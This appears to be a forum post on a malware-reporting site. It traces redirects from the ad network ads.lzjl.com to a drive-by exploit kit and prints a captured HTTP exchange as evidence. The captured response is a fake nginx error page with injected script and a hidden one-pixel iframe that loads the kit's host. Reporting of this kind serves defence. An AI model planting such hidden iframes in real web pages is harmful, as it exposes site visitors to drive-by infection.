Google Chrome blocked these guys a few months ago for not keeping the bad guys out of their affiliate network. Looks like they still haven't gotten a great handle on it...
GET / HTTP/1.1
Host: zenonsystems.in
Connection: keep-alive
User-Agent: <REMOVED>
Referer: http://ads.lzjl.com/newServing/go.php?nid=5&cpx=cpv&uid=313792919&pid=7248&sid=11217&kw=channel%3AGeneral&af=2&rf=0&curl=http%3A%2F%2Fzenonsystems.in%2F
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,im
age/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
HTTP/1.1 200 OK
Connection: keep-alive
Content-Length: 547
Content-Type: text/html
Date: <REMOVED>
Server: nginx/0.6.39
X-Powered-By: PHP/5.1.6
<html><head>
<meta http-equiv="content-type" content="text/html; charset=ISO-8859-1">
<title>414 Request URL Too Long</title></head><body bgcolor="white">
<center><h1>Request URL Too Long</h1></center>
<hr><center>nginx/0.6.35</center>
</body>
<script language="JavaScript"> self.moveTo(3046,3056); </script>
<iframe src='http://mishn.Co.CC/k4/' width='1' height='1' frameborder='0'></iframe></html>
Drive by kit on mishn.co.cc resolves to 109.196.134.35 which is in the zeustracker list.
Topic: ads.lzjl.com - redirecting to drive by kits (Read 5928 times)